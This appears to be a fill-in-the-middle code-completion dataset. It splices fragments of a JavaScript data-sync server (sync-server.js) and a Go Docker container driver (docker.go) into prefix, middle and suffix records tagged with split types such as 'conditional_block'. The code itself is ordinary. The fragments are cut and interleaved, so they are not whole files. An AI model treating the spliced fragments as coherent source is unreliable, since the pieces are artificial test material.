var pendingWorker = new Worker(pendingQueue, pendingProcessorImpl, metricsClient, pendingWorkerOpts);
pendingWorkers.push(pendingWorker);
}
startAllWorkers(syncWorkers);
startAllWorkers(ackWorkers);
startAllWorkers(pendingWorkers);
return callback();
},
function startSyncScheduler(callback) {
var SyncScheduler = syncSchedulerModule(syncLock, syncStorage, metricsClient).SyncScheduler;
syncScheduler = new SyncScheduler(syncQueue, {timeBetweenChecks: syncConfig.schedulerInterval, timeBeforeCrashAssumed: syncConfig.schedulerLockMaxTime, syncSchedulerLockName: syncConfig.schedulerLockName});
syncScheduler.start();
return callback();
},
function startDatasetClientCleaner(callback) {
var datasetClientCleanerBuilder = datasetClientCleanerModule(syncStorage, syncLock);
datasetClientCleaner = datasetClientCleanerBuilder({retentionPeriod: syncConfig.datasetClientCleanerRetentionPeriod, checkFrequency: syncConfig.datasetClientCleanerCheckFrequency});
datasetClientCleaner.start(true, callback);
}
], function(err) {
if (err) {
// If there is any problem setting up the necessary sync internals,
// throw an error to crash the app.
// This is necessary as it is in an unknown state.
throw err;
}
return cb();
});
}
function sync(datasetId, params, cb) {
apiSync(datasetId, params, cb);
}
function syncRecords(datasetId, params, cb) {
apiSyncRecords(datasetId, params, cb);
}
/** Stop cloud data sync for the specified dataset_id */
function stop(dataset_id, cb) {
if (!syncStarted) {
return cb();
}
debug('[%s] stop sync for dataset', dataset_id);
syncStorage.updateManyDatasetClients({datasetId: dataset_id}, {stopped: true}, cb);
}
function setConfig(conf) {
//make sure extend the existing syncConfig object so that we don't have to update other modules which might have references to it.
//if we use new object here then we have to manually update those modules to reflect the change.
syncConfig = _.extend(syncConfig || {}, DEFAULT_SYNC_CONF, conf);
}
/**
* Stop cloud data sync service for ALL datasets and reset.
* This should really only used by tests.
*/
function stopAll(cb) {
//sync is not started yet, but connect could be called already. In this case, just reset a few things
if (!syncStarted) {
interceptors.restore();
dataHandlers.restore();
hashProvider.restore();
mongoDbClient = null;
redisClient = null;
metricsClient = null;
return cb();
}
debug('stopAll syncs');
datasetClientCleaner.stop();
async.parallel([
async.apply(syncStorage.updateManyDatasetClients, {}, {stopped: true}),
async.apply(stopAllWorkers, syncWorkers),
async.apply(stopAllWorkers, ackWorkers),
async.apply(stopAllWorkers, pendingWorkers),
async.apply(syncScheduler.stop.bind(syncScheduler))
], function(err) {
if (err) {
debugError('Failed to stop sync due to error : %s', err);
return cb(err);
}
setConfig();
interceptors.restore();
dataHandlers.restore();
hashProvider.restore();
mongoDbClient = null;
redisClient = null;
metricsClient = null;
ackQueue = null;
pendingQueue = null;
syncQueue = null;
ackWorkers = [];
pendingWorkers = [];
syncWorkers = [];
syncStarted = false;
syncLock = null;
datasetClientCleaner = null;
// Reset the memoized start fn so it can be called again
module.exports.api.start = async.memoize(start);
return cb();
});
}
function globalInterceptRequest(fn) {
interceptors.setDefaultRequestInterceptor(fn);
}
function globalInterceptResponse(fn) {
interceptors.setDefaultResponseInterceptor(fn);
}
function
|
interceptRequest
|
identifier_name
|
|
sync-server.js
|
Number} specify the minimum gap between each retry of applying a pending change.
* Please note that this is just a minimum value as the worker interval value will also affect when a pending change will actually be retried.
* For example, if the worker is scheduled to run the next job in 20 seconds, then the pending change will be retried in 20 seconds if it's the only one in the queue.
*/
pendingWorkerRetryIntervalInSeconds: 10,
/** @type {Number} how often ack workers should check for the next job, in ms. Default: 1 */
ackWorkerInterval: 1,
/** @type {Number} the concurrency value of the ack workers. Default is 1. Can set to 0 to disable the ackWorker completely */
ackWorkerConcurrency: 1,
/** @type {Object} the backoff strategy for the ack worker to use.
* Default strategy is `exp` (exponential) with a max delay of 60s. The min value will always be the same as `ackWorkerInterval`
* The other valid strategy is `fib` (fibonacci). Set it to anything else will disable the backoff behavior */
ackWorkerBackoff: {strategy: 'exp', max: 60*1000},
/** @type {Number} how often sync workers should check for the next job, in ms. Default: 100 */
syncWorkerInterval: 1,
/** @type {Number} the concurrency value of the sync workers. Default is 1. Can set to 0 to disable the syncWorker completely. */
syncWorkerConcurrency: 1,
/** @type {Object} the backoff strategy for the sync worker to use.
* Default strategy is `exp` (exponential) with a max delay of 1s. The min value will always be the same as `syncWorkerInterval`
* Other valid strategies are `none` and `fib` (fibonacci).*/
syncWorkerBackoff: {strategy: 'exp', max: 1000},
/** @type {Number} how often the scheduler should check the datasetClients, in ms. Default: 500 */
schedulerInterval: 500,
/** @type {Number} the max time a scheduler can hold the lock for, in ms. Default: 20000 */
schedulerLockMaxTime: 20000,
/** @type {String} the default lock name for the sync scheduler */
schedulerLockName: 'locks:sync:SyncScheduler',
/**@type {Number} the default concurrency value when update dataset clients in the sync API. Default is 10. In most case this value should not need to be changed */
datasetClientUpdateConcurrency: 10,
/**@type {Boolean} enable/disable collect sync stats to allow query via an endpoint */
collectStats: true,
/**@type {Number} the number of records to keep in order to compute the stats data. Default is 1000. */
statsRecordsToKeep: 1000,
/**@type {Number} how often the stats should be collected. In milliseconds. */
collectStatsInterval: 5000,
/**@type {String} the host of the influxdb server. If set, the metrics data will be sent to the influxdb server. */
metricsInfluxdbHost: null,
/**@type {Number} the port of the influxdb server. It should be a UDP port. */
metricsInfluxdbPort: null,
/**@type {Number} the concurrency value for the component metrics. Default is 10. This value should be increased if there are many concurrent workers. Otherwise the memory useage of the app could go up.*/
metricsReportConcurrency: 10,
/**@type {Boolean} if cache the dataset client records using redis. This can help improve performance for the syncRecords API.
* Can be turned on if there are no records are shared between many different dataset clients. Default is false.
*/
useCache: false,
/**@type {Number} the TTL (Time To Live) value for the messages on the queue. In seconds. Default to 24 hours. */
queueMessagesTTL: 24*60*60,
/**@type {String} specify the maximum retention time of an inactive datasetClient. Any inactive datasetClient that is older than this period of time will be removed.*/
datasetClientCleanerRetentionPeriod: '24h',
/** @type {String} specify the frequency the datasetClient cleaner should run. Default every hour.*/
datasetClientCleanerCheckFrequency: '1h',
/** @type {Boolean} Specify if the server should wait for the ack insert to complete before returning the response for the sync request. Default is true. */
syncReqWaitForAck: true,
/** @type {Number} Specify the max number of ack items will be processed for a single request. Default is -1 (unlimited).*/
syncReqAckLimit: -1,
/** @type {Function} Provide your own cuid generator. It should be a function and the `params` object will be passed to the generator.
* The `params` object will have the following fields:
* `params.query_params`: the query params used on the dataset
* `params.meta_data`: the meta data used on the dataset
* `params.__fh.cuid`: the cuid generated on the client.
*
* This function should not be overidden in most cases. This should *ONLY* be provided if there is a chance that the clients may have duplicated cuids.
*/
cuidProducer: syncUtil.getCuid
};
var syncConfig = _.extend({}, DEFAULT_SYNC_CONF);
var syncStarted = false;
/** Initialise cloud data sync service for specified dataset. */
function init(dataset_id, options, cb) {
debug('[%s] init sync with options %j', dataset_id, options);
datasets.init(dataset_id, options);
//make sure we use the exported version here as the start function should be called only ONCE
module.exports.api.start(function(err) {
if (err)
|
syncStorage.updateManyDatasetClients({datasetId: dataset_id}, {stopped: false}, cb);
});
}
function setClients(mongo, redis) {
mongoDbClient = mongo;
redisClient = redis;
defaultDataHandlers.setMongoDB(mongoDbClient);
cacheClient = cacheClientModule(syncConfig, redisClient);
syncStorage = storageModule(mongoDbClient, cacheClient);
syncLock = syncLockModule(mongoDbClient, 'fhsync_locks');
}
function startAllWorkers(workers) {
workers.forEach(function(worker){
worker.work();
});
}
function stopAllWorkers(workers, cb) {
async.each(workers, function(worker, callback) {
worker.stop.call(worker, callback);
}, cb);
}
/**
* Starts all sync queues, workers & the sync scheduler.
* This should only be called after `connect()`.
* If this is not explicitly called before clients send sync requests,
* it will be called when a client sends a sync request.
* It is OK for this to be called multiple times.
*
* @param {function} cb
*/
function start(cb) {
if (arguments.length < 1) throw new Error('start requires 1 argument');
syncStarted = true;
if (mongoDbClient === null || redisClient === null) {
throw new Error('MongoDB Client & Redis Client are not connected. Ensure you have called sync.connect() before calling sync.init()');
}
metricsClient = metricsModule.init(syncConfig, redisClient);
async.series([
function createQueues(callback) {
ackQueue = new MongodbQueue('fhsync_ack_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
pendingQueue = new MongodbQueue('fhsync_pending_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL, visibility: syncConfig.pendingWorkerRetryIntervalInSeconds});
syncQueue = new MongodbQueue('fhsync_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
async.parallel([
async.apply(ackQueue.create.bind(ackQueue)),
async.apply(pendingQueue.create.bind(pendingQueue)),
async.apply(syncQueue.create.bind(syncQueue))
], callback);
},
function initApis(callback) {
apiSync = syncApiModule(interceptors, ackQueue, pendingQueue, syncStorage, syncConfig);
apiSyncRecords = syncRecordsApiModule(syncStorage, pendingQueue, syncConfig);
return callback();
},
function createWorkers(callback) {
var syncProcessorImpl = syncProcessor(syncStorage, dataHandlers, metricsClient, hashProvider);
var syncWorkerOpts = {
name: 'sync_worker',
interval: syncConfig.syncWorkerInterval,
backoff: syncConfig.syncWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var i = 0; i < syncConfig.syncWorkerConcurrency; i++) {
var syncWorker = new Worker(syncQueue, syncProcessorImpl, metricsClient, syncWorkerOpts);
syncWorkers.push(syncWorker);
}
var ackProcessorImpl = ackProcessor(syncStorage);
|
{
return cb(err);
}
|
conditional_block
|
sync-server.js
|
* `params.__fh.cuid`: the cuid generated on the client.
*
* This function should not be overidden in most cases. This should *ONLY* be provided if there is a chance that the clients may have duplicated cuids.
*/
cuidProducer: syncUtil.getCuid
};
var syncConfig = _.extend({}, DEFAULT_SYNC_CONF);
var syncStarted = false;
/** Initialise cloud data sync service for specified dataset. */
function init(dataset_id, options, cb) {
debug('[%s] init sync with options %j', dataset_id, options);
datasets.init(dataset_id, options);
//make sure we use the exported version here as the start function should be called only ONCE
module.exports.api.start(function(err) {
if (err) {
return cb(err);
}
syncStorage.updateManyDatasetClients({datasetId: dataset_id}, {stopped: false}, cb);
});
}
function setClients(mongo, redis) {
mongoDbClient = mongo;
redisClient = redis;
defaultDataHandlers.setMongoDB(mongoDbClient);
cacheClient = cacheClientModule(syncConfig, redisClient);
syncStorage = storageModule(mongoDbClient, cacheClient);
syncLock = syncLockModule(mongoDbClient, 'fhsync_locks');
}
function startAllWorkers(workers) {
workers.forEach(function(worker){
worker.work();
});
}
function stopAllWorkers(workers, cb) {
async.each(workers, function(worker, callback) {
worker.stop.call(worker, callback);
}, cb);
}
/**
* Starts all sync queues, workers & the sync scheduler.
* This should only be called after `connect()`.
* If this is not explicitly called before clients send sync requests,
* it will be called when a client sends a sync request.
* It is OK for this to be called multiple times.
*
* @param {function} cb
*/
function start(cb) {
if (arguments.length < 1) throw new Error('start requires 1 argument');
syncStarted = true;
if (mongoDbClient === null || redisClient === null) {
throw new Error('MongoDB Client & Redis Client are not connected. Ensure you have called sync.connect() before calling sync.init()');
}
metricsClient = metricsModule.init(syncConfig, redisClient);
async.series([
function createQueues(callback) {
ackQueue = new MongodbQueue('fhsync_ack_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
pendingQueue = new MongodbQueue('fhsync_pending_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL, visibility: syncConfig.pendingWorkerRetryIntervalInSeconds});
syncQueue = new MongodbQueue('fhsync_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
async.parallel([
async.apply(ackQueue.create.bind(ackQueue)),
async.apply(pendingQueue.create.bind(pendingQueue)),
async.apply(syncQueue.create.bind(syncQueue))
], callback);
},
function initApis(callback) {
apiSync = syncApiModule(interceptors, ackQueue, pendingQueue, syncStorage, syncConfig);
apiSyncRecords = syncRecordsApiModule(syncStorage, pendingQueue, syncConfig);
return callback();
},
function createWorkers(callback) {
var syncProcessorImpl = syncProcessor(syncStorage, dataHandlers, metricsClient, hashProvider);
var syncWorkerOpts = {
name: 'sync_worker',
interval: syncConfig.syncWorkerInterval,
backoff: syncConfig.syncWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var i = 0; i < syncConfig.syncWorkerConcurrency; i++) {
var syncWorker = new Worker(syncQueue, syncProcessorImpl, metricsClient, syncWorkerOpts);
syncWorkers.push(syncWorker);
}
var ackProcessorImpl = ackProcessor(syncStorage);
var ackWorkerOpts = {
name: 'ack_worker',
interval: syncConfig.ackWorkerInterval,
backoff: syncConfig.ackWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var j = 0; j < syncConfig.ackWorkerConcurrency; j++) {
var ackWorker = new Worker(ackQueue, ackProcessorImpl, metricsClient, ackWorkerOpts);
ackWorkers.push(ackWorker);
}
var pendingProcessorImpl = pendingProcessor(syncStorage, dataHandlers, hashProvider, metricsClient, syncConfig.pendingWorkerRetryLimit);
var pendingWorkerOpts = {
name: 'pending_worker',
interval: syncConfig.pendingWorkerInterval,
backoff: syncConfig.pendingWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var k = 0; k < syncConfig.pendingWorkerConcurrency; k++) {
var pendingWorker = new Worker(pendingQueue, pendingProcessorImpl, metricsClient, pendingWorkerOpts);
pendingWorkers.push(pendingWorker);
}
startAllWorkers(syncWorkers);
startAllWorkers(ackWorkers);
startAllWorkers(pendingWorkers);
return callback();
},
function startSyncScheduler(callback) {
var SyncScheduler = syncSchedulerModule(syncLock, syncStorage, metricsClient).SyncScheduler;
syncScheduler = new SyncScheduler(syncQueue, {timeBetweenChecks: syncConfig.schedulerInterval, timeBeforeCrashAssumed: syncConfig.schedulerLockMaxTime, syncSchedulerLockName: syncConfig.schedulerLockName});
syncScheduler.start();
return callback();
},
function startDatasetClientCleaner(callback) {
var datasetClientCleanerBuilder = datasetClientCleanerModule(syncStorage, syncLock);
datasetClientCleaner = datasetClientCleanerBuilder({retentionPeriod: syncConfig.datasetClientCleanerRetentionPeriod, checkFrequency: syncConfig.datasetClientCleanerCheckFrequency});
datasetClientCleaner.start(true, callback);
}
], function(err) {
if (err) {
// If there is any problem setting up the necessary sync internals,
// throw an error to crash the app.
// This is necessary as it is in an unknown state.
throw err;
}
return cb();
});
}
function sync(datasetId, params, cb) {
apiSync(datasetId, params, cb);
}
function syncRecords(datasetId, params, cb) {
apiSyncRecords(datasetId, params, cb);
}
/** Stop cloud data sync for the specified dataset_id */
function stop(dataset_id, cb) {
if (!syncStarted) {
return cb();
}
debug('[%s] stop sync for dataset', dataset_id);
syncStorage.updateManyDatasetClients({datasetId: dataset_id}, {stopped: true}, cb);
}
function setConfig(conf) {
//make sure extend the existing syncConfig object so that we don't have to update other modules which might have references to it.
//if we use new object here then we have to manually update those modules to reflect the change.
syncConfig = _.extend(syncConfig || {}, DEFAULT_SYNC_CONF, conf);
}
/**
* Stop cloud data sync service for ALL datasets and reset.
* This should really only used by tests.
*/
function stopAll(cb) {
//sync is not started yet, but connect could be called already. In this case, just reset a few things
if (!syncStarted) {
interceptors.restore();
dataHandlers.restore();
hashProvider.restore();
mongoDbClient = null;
redisClient = null;
metricsClient = null;
return cb();
}
debug('stopAll syncs');
datasetClientCleaner.stop();
async.parallel([
async.apply(syncStorage.updateManyDatasetClients, {}, {stopped: true}),
async.apply(stopAllWorkers, syncWorkers),
async.apply(stopAllWorkers, ackWorkers),
async.apply(stopAllWorkers, pendingWorkers),
async.apply(syncScheduler.stop.bind(syncScheduler))
], function(err) {
if (err) {
debugError('Failed to stop sync due to error : %s', err);
return cb(err);
}
setConfig();
interceptors.restore();
dataHandlers.restore();
hashProvider.restore();
mongoDbClient = null;
redisClient = null;
metricsClient = null;
ackQueue = null;
pendingQueue = null;
syncQueue = null;
ackWorkers = [];
pendingWorkers = [];
syncWorkers = [];
syncStarted = false;
syncLock = null;
datasetClientCleaner = null;
// Reset the memoized start fn so it can be called again
module.exports.api.start = async.memoize(start);
return cb();
});
}
function globalInterceptRequest(fn) {
interceptors.setDefaultRequestInterceptor(fn);
}
function globalInterceptResponse(fn) {
interceptors.setDefaultResponseInterceptor(fn);
}
function interceptRequest(datasetId, fn) {
interceptors.setRequestInterceptor(datasetId, fn);
}
function interceptResponse(datasetId, fn) {
interceptors.setResponseInterceptor(datasetId, fn);
}
function listCollisions(datasetId, params, cb) {
debug('[%s] listCollisions', datasetId);
dataHandlers.listCollisions(datasetId, params.meta_data, cb);
}
/**
* Defines a handler function for deleting a collision from the collisions list.
* Should be called after the dataset is initialised.
*/
function removeCollision(datasetId, params, cb)
|
{
debug('[%s] removeCollision');
dataHandlers.removeCollision(datasetId, params.hash, params.meta_data, cb);
}
|
identifier_body
|
|
sync-server.js
|
Number} specify the minimum gap between each retry of applying a pending change.
* Please note that this is just a minimum value as the worker interval value will also affect when a pending change will actually be retried.
* For example, if the worker is scheduled to run the next job in 20 seconds, then the pending change will be retried in 20 seconds if it's the only one in the queue.
*/
pendingWorkerRetryIntervalInSeconds: 10,
/** @type {Number} how often ack workers should check for the next job, in ms. Default: 1 */
ackWorkerInterval: 1,
/** @type {Number} the concurrency value of the ack workers. Default is 1. Can set to 0 to disable the ackWorker completely */
ackWorkerConcurrency: 1,
/** @type {Object} the backoff strategy for the ack worker to use.
* Default strategy is `exp` (exponential) with a max delay of 60s. The min value will always be the same as `ackWorkerInterval`
* The other valid strategy is `fib` (fibonacci). Set it to anything else will disable the backoff behavior */
ackWorkerBackoff: {strategy: 'exp', max: 60*1000},
/** @type {Number} how often sync workers should check for the next job, in ms. Default: 100 */
syncWorkerInterval: 1,
/** @type {Number} the concurrency value of the sync workers. Default is 1. Can set to 0 to disable the syncWorker completely. */
syncWorkerConcurrency: 1,
/** @type {Object} the backoff strategy for the sync worker to use.
* Default strategy is `exp` (exponential) with a max delay of 1s. The min value will always be the same as `syncWorkerInterval`
* Other valid strategies are `none` and `fib` (fibonacci).*/
syncWorkerBackoff: {strategy: 'exp', max: 1000},
/** @type {Number} how often the scheduler should check the datasetClients, in ms. Default: 500 */
schedulerInterval: 500,
/** @type {Number} the max time a scheduler can hold the lock for, in ms. Default: 20000 */
schedulerLockMaxTime: 20000,
/** @type {String} the default lock name for the sync scheduler */
schedulerLockName: 'locks:sync:SyncScheduler',
/**@type {Number} the default concurrency value when update dataset clients in the sync API. Default is 10. In most case this value should not need to be changed */
datasetClientUpdateConcurrency: 10,
/**@type {Boolean} enable/disable collect sync stats to allow query via an endpoint */
collectStats: true,
/**@type {Number} the number of records to keep in order to compute the stats data. Default is 1000. */
statsRecordsToKeep: 1000,
/**@type {Number} how often the stats should be collected. In milliseconds. */
collectStatsInterval: 5000,
/**@type {String} the host of the influxdb server. If set, the metrics data will be sent to the influxdb server. */
metricsInfluxdbHost: null,
|
/**@type {Number} the concurrency value for the component metrics. Default is 10. This value should be increased if there are many concurrent workers. Otherwise the memory useage of the app could go up.*/
metricsReportConcurrency: 10,
/**@type {Boolean} if cache the dataset client records using redis. This can help improve performance for the syncRecords API.
* Can be turned on if there are no records are shared between many different dataset clients. Default is false.
*/
useCache: false,
/**@type {Number} the TTL (Time To Live) value for the messages on the queue. In seconds. Default to 24 hours. */
queueMessagesTTL: 24*60*60,
/**@type {String} specify the maximum retention time of an inactive datasetClient. Any inactive datasetClient that is older than this period of time will be removed.*/
datasetClientCleanerRetentionPeriod: '24h',
/** @type {String} specify the frequency the datasetClient cleaner should run. Default every hour.*/
datasetClientCleanerCheckFrequency: '1h',
/** @type {Boolean} Specify if the server should wait for the ack insert to complete before returning the response for the sync request. Default is true. */
syncReqWaitForAck: true,
/** @type {Number} Specify the max number of ack items will be processed for a single request. Default is -1 (unlimited).*/
syncReqAckLimit: -1,
/** @type {Function} Provide your own cuid generator. It should be a function and the `params` object will be passed to the generator.
* The `params` object will have the following fields:
* `params.query_params`: the query params used on the dataset
* `params.meta_data`: the meta data used on the dataset
* `params.__fh.cuid`: the cuid generated on the client.
*
* This function should not be overidden in most cases. This should *ONLY* be provided if there is a chance that the clients may have duplicated cuids.
*/
cuidProducer: syncUtil.getCuid
};
var syncConfig = _.extend({}, DEFAULT_SYNC_CONF);
var syncStarted = false;
/** Initialise cloud data sync service for specified dataset. */
function init(dataset_id, options, cb) {
debug('[%s] init sync with options %j', dataset_id, options);
datasets.init(dataset_id, options);
//make sure we use the exported version here as the start function should be called only ONCE
module.exports.api.start(function(err) {
if (err) {
return cb(err);
}
syncStorage.updateManyDatasetClients({datasetId: dataset_id}, {stopped: false}, cb);
});
}
function setClients(mongo, redis) {
mongoDbClient = mongo;
redisClient = redis;
defaultDataHandlers.setMongoDB(mongoDbClient);
cacheClient = cacheClientModule(syncConfig, redisClient);
syncStorage = storageModule(mongoDbClient, cacheClient);
syncLock = syncLockModule(mongoDbClient, 'fhsync_locks');
}
function startAllWorkers(workers) {
workers.forEach(function(worker){
worker.work();
});
}
function stopAllWorkers(workers, cb) {
async.each(workers, function(worker, callback) {
worker.stop.call(worker, callback);
}, cb);
}
/**
* Starts all sync queues, workers & the sync scheduler.
* This should only be called after `connect()`.
* If this is not explicitly called before clients send sync requests,
* it will be called when a client sends a sync request.
* It is OK for this to be called multiple times.
*
* @param {function} cb
*/
function start(cb) {
if (arguments.length < 1) throw new Error('start requires 1 argument');
syncStarted = true;
if (mongoDbClient === null || redisClient === null) {
throw new Error('MongoDB Client & Redis Client are not connected. Ensure you have called sync.connect() before calling sync.init()');
}
metricsClient = metricsModule.init(syncConfig, redisClient);
async.series([
function createQueues(callback) {
ackQueue = new MongodbQueue('fhsync_ack_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
pendingQueue = new MongodbQueue('fhsync_pending_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL, visibility: syncConfig.pendingWorkerRetryIntervalInSeconds});
syncQueue = new MongodbQueue('fhsync_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
async.parallel([
async.apply(ackQueue.create.bind(ackQueue)),
async.apply(pendingQueue.create.bind(pendingQueue)),
async.apply(syncQueue.create.bind(syncQueue))
], callback);
},
function initApis(callback) {
apiSync = syncApiModule(interceptors, ackQueue, pendingQueue, syncStorage, syncConfig);
apiSyncRecords = syncRecordsApiModule(syncStorage, pendingQueue, syncConfig);
return callback();
},
function createWorkers(callback) {
var syncProcessorImpl = syncProcessor(syncStorage, dataHandlers, metricsClient, hashProvider);
var syncWorkerOpts = {
name: 'sync_worker',
interval: syncConfig.syncWorkerInterval,
backoff: syncConfig.syncWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var i = 0; i < syncConfig.syncWorkerConcurrency; i++) {
var syncWorker = new Worker(syncQueue, syncProcessorImpl, metricsClient, syncWorkerOpts);
syncWorkers.push(syncWorker);
}
var ackProcessorImpl = ackProcessor(syncStorage);
var ack
|
/**@type {Number} the port of the influxdb server. It should be a UDP port. */
metricsInfluxdbPort: null,
|
random_line_split
|
docker.go
|
error {
if d.cli != nil {
return nil
}
cli, err := getDockerClient()
if err != nil {
return fmt.Errorf("Unable to init docker client: %v", err)
}
d.cli = cli
return nil
}
func (d *docker) checkBackingImage() error {
glog.Infof("Checking backing docker image %s", d.cfg.DockerImage)
args := filters.NewArgs()
images, err := d.cli.ImageList(context.Background(),
types.ImageListOptions{
MatchName: d.cfg.DockerImage,
All: false,
Filters: args,
})
if err != nil {
glog.Infof("Called to ImageList for %s failed: %v", d.cfg.DockerImage, err)
return err
}
if len(images) == 0 {
glog.Infof("Docker Image not found %s", d.cfg.DockerImage)
return errImageNotFound
}
glog.Infof("Docker Image %s is present on node", d.cfg.DockerImage)
return nil
}
func (d *docker) ensureBackingImage() error {
glog.Infof("Downloading backing docker image %s", d.cfg.DockerImage)
err := d.initDockerClient()
if err != nil {
return err
}
err = d.checkBackingImage()
if err == nil {
return nil
} else if err != errImageNotFound {
glog.Errorf("Backing image check failed")
return err
}
glog.Infof("Backing image not found. Trying to download")
prog, err := d.cli.ImagePull(context.Background(), types.ImagePullOptions{ImageID: d.cfg.DockerImage}, nil)
if err != nil {
glog.Errorf("Unable to download image %s: %v\n", d.cfg.DockerImage, err)
return err
}
defer func() { _ = prog.Close() }()
dec := json.NewDecoder(prog)
var msg jsonmessage.JSONMessage
err = dec.Decode(&msg)
for err == nil {
if msg.Error != nil {
err = msg.Error
break
}
err = dec.Decode(&msg)
}
if err != nil && err != io.EOF {
glog.Errorf("Unable to download image : %v\n", err)
return err
}
return nil
}
func (d *docker) createConfigs(bridge string, userData, metaData []byte, volumes []string) (config *container.Config,
hostConfig *container.HostConfig, networkConfig *network.NetworkingConfig) {
var hostname string
var cmd []string
md := &struct {
Hostname string `json:"hostname"`
}{}
err := json.Unmarshal(metaData, md)
if err != nil {
glog.Info("Start command does not contain hostname. Setting to instance UUID")
hostname = d.cfg.Instance
} else {
glog.Infof("Found hostname %s", md.Hostname)
hostname = md.Hostname
}
ud := &struct {
Cmds [][]string `yaml:"runcmd"`
}{}
err = yaml.Unmarshal(userData, ud)
if err != nil {
glog.Info("Start command does not contain a run command")
} else {
if len(ud.Cmds) >= 1 {
cmd = ud.Cmds[0]
if len(ud.Cmds) > 1 {
glog.Warningf("Only one command supported. Found %d in userdata", len(ud.Cmds))
}
}
}
config = &container.Config{
Hostname: hostname,
Image: d.cfg.DockerImage,
Cmd: cmd,
}
hostConfig = &container.HostConfig{Binds: volumes}
if d.cfg.Mem > 0 {
// Docker memory limit is in bytes.
hostConfig.Memory = int64(1024 * 1024 * d.cfg.Mem)
}
if d.cfg.Cpus > 0 {
// CFS quota period - default to 100ms.
hostConfig.CPUPeriod = 100 * 1000
hostConfig.CPUQuota = hostConfig.CPUPeriod * int64(d.cfg.Cpus)
}
networkConfig = &network.NetworkingConfig{}
if bridge != "" {
config.MacAddress = d.cfg.VnicMAC
hostConfig.NetworkMode = container.NetworkMode(bridge)
networkConfig.EndpointsConfig = map[string]*network.EndpointSettings{
bridge: {
IPAMConfig: &network.EndpointIPAMConfig{
IPv4Address: d.cfg.VnicIP,
},
},
}
}
return
}
func (d *docker) umountVolumes(vols []volumeConfig) {
for _, vol := range vols {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err := d.mount.Unmount(vd, 0); err != nil {
glog.Warningf("Unable to unmount %s: %v", vd, err)
continue
|
}
glog.Infof("%s successfully unmounted", vol.UUID)
}
}
func (d *docker) unmapVolumes() {
for _, vol := range d.cfg.Volumes {
if err := d.storageDriver.UnmapVolumeFromNode(vol.UUID); err != nil {
glog.Warningf("Unable to unmap %s: %v", vol.UUID, err)
continue
}
glog.Infof("Unmapping volume %s", vol.UUID)
}
}
func (d *docker) mapAndMountVolumes() error {
for mapped, vol := range d.cfg.Volumes {
var devName string
var err error
if devName, err = d.storageDriver.MapVolumeToNode(vol.UUID); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to map (%s) %v", vol.UUID, err)
}
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = d.mount.Mount(devName, vd); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to mount (%s) %v", vol.UUID, err)
}
}
return nil
}
func (d *docker) prepareVolumes() ([]string, error) {
var err error
volumes := make([]string, len(d.cfg.Volumes))
for _, vol := range d.cfg.Volumes {
if vol.Bootable {
return nil, fmt.Errorf("Cannot attach bootable volumes to containers")
}
}
for i, vol := range d.cfg.Volumes {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = os.MkdirAll(vd, 0777); err != nil {
return nil, fmt.Errorf("Unable to create instances directory (%s) %v",
instancesDir, err)
}
volumes[i] = fmt.Sprintf("%s:/volumes/%s", vd, vol.UUID)
}
return volumes, nil
}
func (d *docker) createImage(bridge string, userData, metaData []byte) error {
err := d.initDockerClient()
if err != nil {
return err
}
volumes, err := d.prepareVolumes()
if err != nil {
glog.Errorf("Unable to mount container volumes %v", err)
return err
}
config, hostConfig, networkConfig := d.createConfigs(bridge, userData, metaData, volumes)
resp, err := d.cli.ContainerCreate(context.Background(), config, hostConfig, networkConfig,
d.cfg.Instance)
if err != nil {
glog.Errorf("Unable to create container %v", err)
return err
}
idPath := path.Join(d.instanceDir, "docker-id")
err = ioutil.WriteFile(idPath, []byte(resp.ID), 0600)
if err != nil {
glog.Errorf("Unable to store docker container ID %v", err)
_ = dockerDeleteContainer(d.cli, resp.ID, d.cfg.Instance)
return err
}
d.dockerID = resp.ID
// This value is configurable. Need to figure out how to get it from docker.
d.cfg.Disk = 10000
return nil
}
func dockerDeleteContainer(cli containerManager, dockerID, instanceUUID string) error {
err := cli.ContainerRemove(context.Background(),
types.ContainerRemoveOptions{
ContainerID: dockerID,
Force: true})
if err != nil {
glog.Warningf("Unable to delete docker instance %s:%s err %v",
instanceUUID, dockerID, err)
}
return err
}
func (d *docker) deleteImage() error {
if d.dockerID == "" {
return nil
}
err := d.initDockerClient()
if err != nil {
return err
}
return dockerDeleteContainer(d.cli, d.dockerID, d.cfg.Instance)
}
func (d *docker) startVM(vnicName, ipAddress, cephID string) error {
err := d.initDockerClient()
if err != nil {
return err
}
err = d.mapAndMountVolumes()
if err != nil {
glog.Errorf("Unable to map container volumes: %v", err)
return err
}
err = d.cli.ContainerStart(context.Background(), d.dockerID)
if err != nil {
d.umountVolumes(d.cfg.Volumes)
d.unmapVolumes()
glog.Errorf("Unable to start container %v", err)
return err
}
return nil
}
|
random_line_split
|
|
docker.go
|
0 {
// CFS quota period - default to 100ms.
hostConfig.CPUPeriod = 100 * 1000
hostConfig.CPUQuota = hostConfig.CPUPeriod * int64(d.cfg.Cpus)
